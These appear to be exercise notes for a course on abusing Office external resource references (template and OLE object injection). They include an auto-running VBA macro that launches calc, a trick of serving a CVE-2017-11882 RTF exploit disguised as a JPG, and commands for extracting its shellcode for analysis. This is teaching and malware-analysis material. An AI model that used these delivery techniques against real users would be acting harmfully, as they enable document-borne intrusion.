HTTP Web Server used in exercises: [HTTPserver_corsdevserver_special.py]
WWW folder example in exercises (bitcoin.jpg - exploitable RTF document example): [www]
Video: [Abusing External Resource References MSOffice [part1] - TEMPLATE_INJECTION]
Part1 - example Macro code for template:
Sub Document_Open()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc"
End Sub
Video: [Abusing External Resource References MSOffice [part2] - OLEOBJECT_INJECTION]
Oleobject injection - Another method of abusing External Resource References.
You can easily embed a link to another object (oleobject embedding) as example (rtf exploiting CVE-2017-11882) served as jpg file -> send as Content-type: "application/msword".
Analyzing RTF document containing exploit - CVE-2017-11882:
py -2 rtfdump.py AD238C4B.doc -s 7 -H -d > xxx.bin
oledump.py -f l xxx.bin
cut-bytes.py -d 0x23: xxx.bin > xxx2.bin
oledump.py xxx2.bin -s 4 -d > xxx3.bin
scdbg
DidierStevensSuite - https://github.com/DidierStevens/DidierStevensSuite
scdbg - http://sandsprite.com/blogs/index.php?uid=7&pid=152
oletools - https://github.com/decalage2/oletools